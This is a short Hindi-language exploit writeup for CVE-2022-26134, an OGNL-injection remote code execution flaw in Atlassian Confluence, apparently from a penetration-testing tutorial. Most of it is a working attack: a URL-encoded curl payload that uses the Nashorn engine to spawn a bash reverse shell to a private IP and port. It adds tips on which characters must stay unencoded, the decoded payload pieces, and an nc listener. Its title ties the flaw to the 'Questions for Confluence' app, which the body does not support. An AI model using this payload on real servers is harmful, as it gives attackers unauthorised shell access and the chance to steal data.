
Atlassian के Questions for Confluence ऐप CVE-2022-26134 का सक्रिय शोषण
CVE-2022-26134 एक गंभीर रिमोट कोड निष्पादन (RCE) कमजोरी है जो Atlassian Confluence को प्रभावित करती है। यह कमजोरी अप्रमाणित हमलावरों को कमजोर एंडपॉइंट्स में OGNL एक्सप्रेशन इंजेक्ट करके मनमाना कोड निष्पादित करने की अनुमति देती है।
निम्नलिखित CURL कमांड इस कमजोरी के सक्रिय शोषण को प्रदर्शित करता है, जो रिवर्स शेल निष्पादित करने के लिए Java के Nashorn इंजन का उपयोग करता है:
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/
इन संशोधनों को करते समय, हमें URL एन्कोडिंग को भी ध्यान में रखना होगा। प्रूफ-ऑफ-कॉन्सेप्ट में पेलोड स्ट्रिंग पूरी तरह से URL एन्कोडेड नहीं है। कुछ वर्ण (विशेष रूप से ".", "-" और "/") एन्कोडेड नहीं हैं। हालांकि हमेशा ऐसा नहीं होता, इस शोषण के लिए, यह पेलोड के काम करने के लिए महत्वपूर्ण साबित होता है। यदि इनमें से कोई भी वर्ण एन्कोडेड है, तो सर्वर URL को अलग तरीके से पार्स करेगा, और पेलोड निष्पादित नहीं हो सकता है। इसका मतलब है कि हम संशोधन के बाद पूरे पेलोड पर URL एन्कोडिंग लागू नहीं कर सकते।
${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}
new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()
nc -lvnp 1270
यह दस्तावेज़ केवल शैक्षिक उद्देश्यों के लिए है। सिस्टम का अनधिकृत शोषण अवैध है और इसके गंभीर परिणाम हो सकते हैं। सुरक्षा मूल्यांकन करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।